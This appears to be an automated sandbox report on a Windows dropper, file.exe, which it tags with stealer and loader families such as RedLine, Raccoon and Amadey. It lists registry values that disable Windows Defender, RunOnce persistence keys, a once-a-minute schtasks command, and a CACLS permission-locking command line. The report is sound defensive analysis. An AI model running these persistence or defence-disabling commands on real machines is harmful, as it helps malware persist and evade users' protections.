Analysis Overview
SHA256
359b38c384b3b2140bf73ac6038e1e19b09e8a8d602d19778cf7973b3c052a61
Threat Level: Known bad
The file file.exe was found to be: Known bad.
Malicious Activity Summary
ZGRat
Amadey
Glupteba payload
SectopRAT
SectopRAT payload
RedLine
Raccoon
RedLine payload
Raccoon Stealer payload
Modifies Windows Defender Real-time Protection settings
Detect ZGRat V1
Glupteba
SmokeLoader
DcRat
Downloads MZ/PE file
Stops running service(s)
Modifies Windows Firewall
Windows security modification
Loads dropped DLL
Executes dropped EXE
UPX packed file
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Detected potential entity reuse from brand paypal.
Launches sc.exe
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Modifies registry key
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Enumerates system info in registry
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-31 05:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-31 05:28
Reported
2023-10-31 05:30
Platform
win10v2004-20231023-en
Max time kernel
36s
Max time network
152s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mj1gQ4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\958.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\958.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WW1Gm42.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HG0CX5rO.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tK3WZ13.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fh5vZ94.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ei4jY79.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FW5WP06.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1FF.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3752 set thread context of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ly57yE6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4992 set thread context of 1088 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ki6802.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2380 set thread context of 228 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4je116wc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4720 set thread context of 6224 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1XI48lH3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tK3WZ13.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tK3WZ13.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fh5vZ94.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fh5vZ94.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WW1Gm42.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WW1Gm42.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ei4jY79.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ei4jY79.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FW5WP06.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\FW5WP06.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ly57yE6.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ly57yE6.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ki6802.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ki6802.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3kS96qN.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 540
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4je116wc.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4je116wc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mj1gQ4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mj1gQ4.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6vY7PH5.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6vY7PH5.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BA09.tmp\BA0A.tmp\BA0B.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7093548274571292969,13048696657077383211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7093548274571292969,13048696657077383211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2852 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2800 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
